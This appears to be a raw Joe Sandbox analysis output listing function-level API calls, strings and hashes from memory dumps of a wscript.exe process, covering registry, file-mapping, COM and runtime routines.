                                            • Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}, xrefs: 009C7110
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CloseOpenQueryValue_wcsnicmp
                                            • String ID: Locale$Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
                                            • API String ID: 2262609651-1161606707
                                            • Opcode ID: 9f78c01a032703c40be483ef531b802273e30f3f635f5e2050b94bbdc4c8613c
                                            • Instruction ID: 475518fe09ba98f912aacfb03c04722b2ebfc993bd97b778f9079b119452288c
                                            • Instruction Fuzzy Hash: F311A035D2821AEBCB109FE5DD0DFBFB7BDEB84740F050018E912A3160E6308A05EB65
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 009C04FE
                                            • _ftol2.MSVCRT ref: 009C0548
                                            • MsgWaitForMultipleObjectsEx.USER32(00000000,00000000,00000000,00001DFF,00000004), ref: 009C055D
                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 009C056D
                                            • DispatchMessageA.USER32(?), ref: 009C057C
                                            • GetTickCount.KERNEL32 ref: 009C0594
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CountMessageTick$DispatchMultipleObjectsPeekWait_ftol2
                                            • String ID:
                                            • API String ID: 4281434459-0
                                            • Opcode ID: 6cdcea434feb586f372105eb3c62309d86f37f30b915d525c8d040e908242743
                                            • Instruction ID: 541399beef9dde27c3fdb2366d3e5708a48c0baac9014004fb218bf5dc369c52
                                            • Instruction Fuzzy Hash: F621DF71E0834AABE711AF62DD0CF9B7BB8FBC4350F114A1CFA95D11A4EB20C4148E92
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 009C45B6
                                            • SafeArrayGetElement.OLEAUT32(?,?,?), ref: 009C4606
                                            • SysStringLen.OLEAUT32(?), ref: 009C4617
                                            • SysStringLen.OLEAUT32(?), ref: 009C4622
                                            • VariantClear.OLEAUT32(?), ref: 009C4645
                                            • VariantClear.OLEAUT32(?), ref: 009C467B
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Variant$ClearString$ArrayElementInitSafe
                                            • String ID:
                                            • API String ID: 598207039-0
                                            • Opcode ID: 6f0ea047156d9a69473ab16f6913861a1e7a0bba5b75a62e8776dbe7f12cf7d0
                                            • Instruction ID: 36bf8798d4176b32693bd9e8da257dabb030783da2a867b13667379c3048e1eb
                                            • Instruction Fuzzy Hash: 99314C72A08316AFC710DF64D998D5ABBE9FB88360F04492DF9A5C7251EB30D904CB92
                                            APIs
                                            • CreateFileW.KERNEL32(009B9D3D,80000000,00000001,00000000,00000003,08000000,00000000,00000000,009B10C4,00000000,000000FF,000000FF,?,009B9D3D,009C2FD0), ref: 009C615C
                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,009B9D3D,000000FF,00000000,00000000,00000000,00000000,00000000,009B10C4,00000000,000000FF,000000FF,?,009B9D3D,009C2FD0), ref: 009C616E
                                            • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,009B9D3D,009C2FD0,?,?,?,00000000,009B10C4), ref: 009C617A
                                            • __alloca_probe_16.LIBCMT ref: 009C618E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ByteCharCreateErrorFileLastMultiWide__alloca_probe_16
                                            • String ID:
                                            • API String ID: 2439737388-0
                                            • Opcode ID: b5c87c1eec24e2a3c95910a9f8c1ae7ddf4a1da5c54e6d695e982a5448778fe0
                                            • Instruction ID: b6c4122814f5a36332e9d1e175832247623c18ca6a17f074800841219b53ad79
                                            • Instruction Fuzzy Hash: EA212730A19124BBEB315B668C4DFAB7EADEF467B1F24011CB519E51D2CA709900D7F2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: -$/$cscript$wscript
                                            • API String ID: 0-2169273652
                                            • Opcode ID: 83a080412ef76bcd39ac7dec2c5bb423aa2f0229ce429f7220a774d37d90b612
                                            • Instruction ID: 944f29abb43b2243314ce6efba2e44039ef7bb7c5759d6e8e29dc2956a2c9a95
                                            • Opcode Fuzzy Hash: 83a080412ef76bcd39ac7dec2c5bb423aa2f0229ce429f7220a774d37d90b612
                                            • Instruction Fuzzy Hash: 79B11730E043859AEB35CF788A44FFEBBF9AF11314F24491ED881A7291D2759A85C763
                                            APIs
                                            • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,00000000,00000000,?,00000000,00000000,?,009C75C3,00000000), ref: 009C6E10
                                            • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,009C75C3,00000000), ref: 009C6E24
                                            • CloseHandle.KERNEL32(00000000,?,009C75C3,00000000), ref: 009C6E2D
                                            • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,009C75C3,00000000), ref: 009C6E3D
                                            • CloseHandle.KERNEL32(00000000,?,009C75C3,00000000), ref: 009C6E46
                                            • LoadLibraryExW.KERNEL32(?,00000000,00000000,?,00000000,00000000,?,009C75C3,00000000), ref: 009C6E67
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: File$CloseCreateHandle$LibraryLoadMappingView
                                            • String ID:
                                            • API String ID: 1262414356-0
                                            • Opcode ID: b38e0bdad70c1dd16b1100dc6f28017a7fb3cb20da10bf474c886023f7b8d154
                                            • Instruction ID: f1441a8c0bfda5ca975338b2e0931a7b25da9729dd95d973b6d9e8ab62024262
                                            • Opcode Fuzzy Hash: b38e0bdad70c1dd16b1100dc6f28017a7fb3cb20da10bf474c886023f7b8d154
                                            • Instruction Fuzzy Hash: D70126B6E18218BFF7201735AC8DF7B655CD78AFE9F194529FA0193180D5618C205270
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-$0$0
                                            • API String ID: 1302938615-699404926
                                            • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction ID: b3e618fb3986f9bcd7f3a48a204262d4fb94d2542e4c936246be65e237db17a5
                                            • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                            • Instruction Fuzzy Hash: 0D81A030E052499EDF24CF68C8517BEBBB1BF45310F1C461BDAA1AB2D1D774B8628B61
                                            APIs
                                            • RegCloseKey.ADVAPI32(00000000,00000001,?,?,?,00000000,00000000,?,?,?,?,009B809D,00000000,00000000), ref: 009BBC93
                                            • RegCloseKey.ADVAPI32(00000000,00000001,?,?,?,00000000,00000000,?,?,?,?,009B809D,00000000), ref: 009BBCA2
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Close
                                            • String ID: Enabled$Remote$Software\Microsoft\Windows Script Host\Settings
                                            • API String ID: 3535843008-3078226056
                                            • Opcode ID: 368c1bbdcad5d9258db615cebefcbdcf3e653c54219146212e00c1f92c03ca1e
                                            • Instruction ID: bc2719862177562498010dada63c6193d1df35a1f6a701bb46539b1ef827491d
                                            • Opcode Fuzzy Hash: 368c1bbdcad5d9258db615cebefcbdcf3e653c54219146212e00c1f92c03ca1e
                                            • Instruction Fuzzy Hash: 181191B1E10218BBEB14DB88CE05BEE7EBEDFC0321F144169B841672A5CBB05E41E694
                                            APIs
                                              • Part of subcall function 009C792D: malloc.MSVCRT ref: 009C7945
                                            • GetCurrentThreadId.KERNEL32 ref: 009B80C5
                                            • CoRegisterClassObject.OLE32(009B3A14,00000000,00000014,00000000,?,00000000,00000000,?,?,?,009B9188,000000FF,000000FF,000000FF), ref: 009B80ED
                                            • DispatchMessageA.USER32(?), ref: 009B814D
                                            • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 009B815A
                                            • CoRevokeClassObject.OLE32(?,?,?,009B9188,000000FF,000000FF,000000FF,?,?,00000000), ref: 009B8167
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: ClassMessageObject$CurrentDispatchRegisterRevokeThreadmalloc
                                            • String ID:
                                            • API String ID: 2658232301-0
                                            • Opcode ID: 47f3c08693870c2a5f431e9f3f249c12f3ed2e87bfd7bd08c7e1f24d3042faec
                                            • Instruction ID: 96200d3cccd6e242cd4cca974aaeed7cf5acdb54118044ecd3f3583eaf701b37
                                            • Opcode Fuzzy Hash: 47f3c08693870c2a5f431e9f3f249c12f3ed2e87bfd7bd08c7e1f24d3042faec
                                            • Instruction Fuzzy Hash: D831A275A04215EBCB109FA9D948ADFBABCEF8D360F144455E601A7250CF75DC02CB60
                                            APIs
                                            • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00000000,?,?,009B10C4,009B10C4,?,00000000,009B10C4), ref: 009C5A08
                                            • __alloca_probe_16.LIBCMT ref: 009C5A52
                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,?,?,?,009B10C4,009B10C4,?,00000000,009B10C4), ref: 009C5A6A
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000001,?,?,?,?,009B10C4,009B10C4,?), ref: 009C5A9C
                                            • GetLastError.KERNEL32(?,000000FF,00000001,?,?,?,?,009B10C4,009B10C4,?), ref: 009C5AA6
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: QueryValue$ByteCharErrorLastMultiWide__alloca_probe_16
                                            • String ID:
                                            • API String ID: 3112009249-0
                                            • Opcode ID: 4378dcabc4a5753efad828b4173f76d2962bc8dcdfaba2d720e312b811de4805
                                            • Instruction ID: bddb2feccf032e81b379f5ebee81165a7bb68252844a4b24152b2506ec89c693
                                            • Opcode Fuzzy Hash: 4378dcabc4a5753efad828b4173f76d2962bc8dcdfaba2d720e312b811de4805
                                            • Instruction Fuzzy Hash: 0B318131E10A15BFCB248B6B8888FEFBBBCEF45360F51825DE415D6150D630E981CBA2
                                            APIs
                                              • Part of subcall function 009C792D: malloc.MSVCRT ref: 009C7945
                                            • GetCurrentThreadId.KERNEL32 ref: 009BFE04
                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,009B10C4,00000001,009B10C4,?,009B94FA,00000001,009B1314,-00000001,009B1100,009B10C4), ref: 009BFE26
                                            • GetLastError.KERNEL32(?,009B94FA,00000001,009B1314,-00000001,009B1100,009B10C4), ref: 009BFE33
                                            • CreateThread.KERNEL32(00000000,00000000,009BFEB0,00000000,00000000,00000014), ref: 009BFE57
                                            • CloseHandle.KERNEL32(?,?,?,?,009B94FA,00000001,009B1314,-00000001,009B1100,009B10C4), ref: 009BFE71
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CreateThread$CloseCurrentErrorEventHandleLastmalloc
                                            • String ID:
                                            • API String ID: 1671080663-0
                                            • Opcode ID: 41f7caca774c9da206b519cda692b4f92716281e5dfdf0c3930ed6a967be1fe8
                                            • Instruction ID: d1a8a56033520c0c9be410df9ed39c914644b979a2aeb269c06afa54e60885d1
                                            • Opcode Fuzzy Hash: 41f7caca774c9da206b519cda692b4f92716281e5dfdf0c3930ed6a967be1fe8
                                            • Instruction Fuzzy Hash: E721A1B6800B16AF83108F5ADD99966FABCFF84764311823DA80597611D730EC108AE0
                                            Strings
                                            • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 04DD02E7
                                            • RTL: Re-Waiting, xrefs: 04DD031E
                                            • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 04DD02BD
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                            • API String ID: 0-2474120054
                                            • Opcode ID: c448c8c63b12441a92fc459fd945b3efeb63c20df6c04100ac10094b6225fb01
                                            • Instruction ID: 7018c69168acbcea723e0c24c047b78b011ccf572d25cfbf95d013e355665a5b
                                            • Opcode Fuzzy Hash: c448c8c63b12441a92fc459fd945b3efeb63c20df6c04100ac10094b6225fb01
                                            • Instruction Fuzzy Hash: BEE1AD706047419FE725EF28C885B2AB7E0FB88318F140A5DF5A58B2E1E774F945CB52
                                            APIs
                                              • Part of subcall function 009C792D: malloc.MSVCRT ref: 009C7945
                                              • Part of subcall function 009C51D4: GetProcessHeap.KERNEL32(00000000,00000038,00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C51E5
                                              • Part of subcall function 009C51D4: HeapFree.KERNEL32(00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C51EC
                                              • Part of subcall function 009C51D4: GetProcessHeap.KERNEL32(00000000,009B10C4,00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C520B
                                              • Part of subcall function 009C51D4: HeapAlloc.KERNEL32(00000000,?,009BE9EB,00001000,00000000,009B10C4,009B10C4), ref: 009C5212
                                            • CLSIDFromString.OLE32(009B9571,?,00001000,00000000,009B10C4,009B10C4), ref: 009BEA00
                                            • CoCreateInstance.OLE32(?,00000000,00000017,009B3860,00000000), ref: 009BEA21
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocCreateFreeFromInstanceStringmalloc
                                            • String ID: WSH$WScript
                                            • API String ID: 2172334828-1019903269
                                            • Opcode ID: fbe4332b0e8124bb18d72f05d783fe54d249acd0e6333a2d4ee1831cfe299de2
                                            • Instruction ID: ee39172c5bec277f5d2b1385a6dcd950c72cfe9b9caa279094eff7f58ec911d4
                                            • Opcode Fuzzy Hash: fbe4332b0e8124bb18d72f05d783fe54d249acd0e6333a2d4ee1831cfe299de2
                                            • Instruction Fuzzy Hash: 12918C75B106159FDB04CF99D995AADB7F9FF8C320F150069E502AB391CB74AC02CB90
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: wcscpy_s$FreeString
                                            • String ID: WSH
                                            • API String ID: 4021863947-2133009938
                                            • Opcode ID: 78dfc21c4ef210601ab9aecef356882b2482b9a81ae049cb04512b257c274d9d
                                            • Instruction ID: f879ec90eefd079e55656c60106a0d8c278b71902538744b3405c1c205a08ea9
                                            • Opcode Fuzzy Hash: 78dfc21c4ef210601ab9aecef356882b2482b9a81ae049cb04512b257c274d9d
                                            • Instruction Fuzzy Hash: DB510574E142099BDB249F24DC99FAE73BAFF88304F1404ADE41697391CA30AD42DB52
                                            Strings
                                            • RTL: Re-Waiting, xrefs: 04DD7BAC
                                            • RTL: Resource at %p, xrefs: 04DD7B8E
                                            • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04DD7B7F
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 0-871070163
                                            • Opcode ID: 7afcc28e1c033fb10f1800d197f1d7ce5477f8170b7d062f6e8296455120db8c
                                            • Instruction ID: fb5dffbed5b56e7cf6c31d60eb7a3c31893aca12a38c1d71625f425dcbbf5d6a
                                            • Opcode Fuzzy Hash: 7afcc28e1c033fb10f1800d197f1d7ce5477f8170b7d062f6e8296455120db8c
                                            • Instruction Fuzzy Hash: 5141E0353007029FDB20DE25D840B6AB7E5FF88714F110A1EF89ADB680EB71F8058B91
                                            APIs
                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04DD728C
                                            Strings
                                            • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04DD7294
                                            • RTL: Re-Waiting, xrefs: 04DD72C1
                                            • RTL: Resource at %p, xrefs: 04DD72A3
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                            • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                            • API String ID: 885266447-605551621
                                            • Opcode ID: 0ef6c1fea1ce21cd79df25e4547fd02f401fbc4d6ac0f14ac314b2a44197860d
                                            • Instruction ID: d722d4874c56e91d5dae049f6bf367af49203688d5138850d809ca32e2a72800
                                            • Opcode Fuzzy Hash: 0ef6c1fea1ce21cd79df25e4547fd02f401fbc4d6ac0f14ac314b2a44197860d
                                            • Instruction Fuzzy Hash: 0441E031700242AFDB21DE25CC41F6ABBE5FF84718F15061AF995EB240DB21F8569BE1
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: %%%u$]:%u
                                            • API String ID: 48624451-3050659472
                                            • Opcode ID: e9e13ff3e931681a326966dd14cdc318e8a19a264841f729b9bb1a465335fa38
                                            • Instruction ID: 51b598f8ce403adcfb0bcf22a9b800fbf87561750fff3d438e1334dadf743bc1
                                            • Opcode Fuzzy Hash: e9e13ff3e931681a326966dd14cdc318e8a19a264841f729b9bb1a465335fa38
                                            • Instruction Fuzzy Hash: 46318272A002199FDB20DF29CC40BFEB7F8EB44754F445596E949E3210EB30BA548BA1
                                            APIs
                                            • RegOpenKeyExA.ADVAPI32(00000000,Shell,00000000,00020006,?,00000000,00000000,?,009BA758,?,Open2,?,009BA8DE,00000000), ref: 009BA5BA
                                            • RegSetValueExA.ADVAPI32(?,009B3DC0,00000000,00000001,009BA758,00000001,?,009BA758,?,Open2,?,009BA8DE,00000000), ref: 009BA5F0
                                            • RegCloseKey.ADVAPI32(?,?,009BA758,?,Open2,?,009BA8DE,00000000), ref: 009BA5FB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: CloseOpenValue
                                            • String ID: Shell
                                            • API String ID: 779948276-2220072441
                                            • Opcode ID: 7f6cc1842a2d263f9be72b6dcd5821189e9a1c16901bb78155bbc1587450af33
                                            • Instruction ID: 2f342d60d31784d0ebb3907fd22d8389e8f094fe62441159d641dbcd2b8664fa
                                            • Opcode Fuzzy Hash: 7f6cc1842a2d263f9be72b6dcd5821189e9a1c16901bb78155bbc1587450af33
                                            • Instruction Fuzzy Hash: 4101D677A50224BBDB358B648D05FFE7729AB84B60F148158FD42AB140CAA2DE059690
                                            APIs
                                            • CreateErrorInfo.OLEAUT32(00000A2C,?,?,?,?,009B73FB,009B3A24,WSHRemote.Execute,00000A2C), ref: 009BB1C7
                                            • SetErrorInfo.OLEAUT32(00000000,?,?,?,?), ref: 009BB31A
                                            • SysFreeString.OLEAUT32(009B3A24), ref: 009BB36D
                                            • SysFreeString.OLEAUT32(009B73FB), ref: 009BB376
                                              • Part of subcall function 009BB654: FormatMessageW.KERNEL32(00000500,009B3A24,00000000,00000000,?,00000000,?,?,00000A2C,00000000,009BB25F,?,?,?,?), ref: 009BB68F
                                              • Part of subcall function 009BB654: GetLastError.KERNEL32(?,00000A2C,00000000,009BB25F,?,?,?,?,?,009B73FB,009B3A24,WSHRemote.Execute,00000A2C), ref: 009BB69D
                                              • Part of subcall function 009BB654: LocalFree.KERNEL32(00000000,?,00000A2C,00000000,009BB25F,?), ref: 009BB774
                                              • Part of subcall function 009BB654: LocalFree.KERNEL32(00000000,?,00000A2C,00000000,009BB25F,?), ref: 009BB783
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: Free$Error$InfoLocalString$CreateFormatLastMessage
                                            • String ID:
                                            • API String ID: 878232057-0
                                            • Opcode ID: 8822e977ee52fd06873f6bde1900589d91e889db5b7b6da571520b0a858bc2d2
                                            • Instruction ID: a163bcef6eaf2638029e895d1d6e78050ad10320f11d5a2e143b2014e2d866a2
                                            • Opcode Fuzzy Hash: 8822e977ee52fd06873f6bde1900589d91e889db5b7b6da571520b0a858bc2d2
                                            • Instruction Fuzzy Hash: 1E517C75B1160AEBCB04DF95E994AAD7BF9FF48324F210069E60297390CF74AD02DB81
                                            APIs
                                            • LoadStringW.USER32(?,?,00000800,00000000), ref: 009C5055
                                            • LoadStringA.USER32(?,?,00000800,00000000), ref: 009C5071
                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000800,?,?,00000800,00000000,00000000,00000000,?,009BBAA2,?,?), ref: 009C508E
                                            • SysAllocString.OLEAUT32(?), ref: 009C50A1
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: String$Load$AllocByteCharMultiWide
                                            • String ID:
                                            • API String ID: 1944948655-0
                                            • Opcode ID: 5e63d0714f140cb5c9a71fffd57d456b52b7219770d99a526ef4d92b3e4bc944
                                            • Instruction ID: 7bb49fc11cd69ed6b8a40f9e62ac98e33065761fdafcde78c9e55bc237585438
                                            • Opcode Fuzzy Hash: 5e63d0714f140cb5c9a71fffd57d456b52b7219770d99a526ef4d92b3e4bc944
                                            • Instruction Fuzzy Hash: AC11C272D14129AFE761DB65DC08EEBB7ACEB84710F044069B609D2150DF309E44DBA0
                                            APIs
                                            • GetFileSize.KERNEL32(009B9D3D,00000000,00000000,00000000,?,009C61DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 009C620F
                                            • CreateFileMappingA.KERNEL32(009B9D3D,00000000,00000002,00000000,00000000,00000000), ref: 009C6229
                                            • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,009C61DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000), ref: 009C623C
                                            • GetLastError.KERNEL32(?,009C61DD,00000000,?,?,80000000,00000001,00000000,00000003,08000000,00000000,?,00000000,00000000,00000000), ref: 009C6249
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4518945717.00000000009B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 009B0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_9b0000_wscript.jbxd
                                            Similarity
                                            • API ID: File$CreateErrorLastMappingSizeView
                                            • String ID:
                                            • API String ID: 2735091159-0
                                            • Opcode ID: 55c737a47d97bab302c6bec9348bb98897b8b4c10f9844962b30e34ee7575d19
                                            • Instruction ID: 8ede5c479651bd27729c9361dd601c54a109d2c3f8e5528a676104829b916390
                                            • Opcode Fuzzy Hash: 55c737a47d97bab302c6bec9348bb98897b8b4c10f9844962b30e34ee7575d19
                                            • Instruction Fuzzy Hash: E3016275914252AAD7305B779C0CF277AECEBC6B20B104A2DB975C2290DA34D800E735
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.4520280156.0000000004D30000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D30000, based on PE: true
                                            • Associated: 00000006.00000002.4520280156.0000000004E59000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004E5D000.00000040.00001000.00020000.00000000.sdmp
                                            • Associated: 00000006.00000002.4520280156.0000000004ECE000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_4d30000_wscript.jbxd
                                            Similarity
                                            • API ID: __aulldvrm
                                            • String ID: +$-
                                            • API String ID: 1302938615-2137968064
                                            • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction ID: 6bf2654a12b0c6f1adef0105c2530cd8f2616f351a9622e6f9de0837100d58dd
                                            • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                            • Instruction Fuzzy Hash: B6918071F002169ADF24DF69C881ABEB7A5FF44720F14451BE855AB2C0E730EA619761
                                            Strings
                                            Memory Dump Source
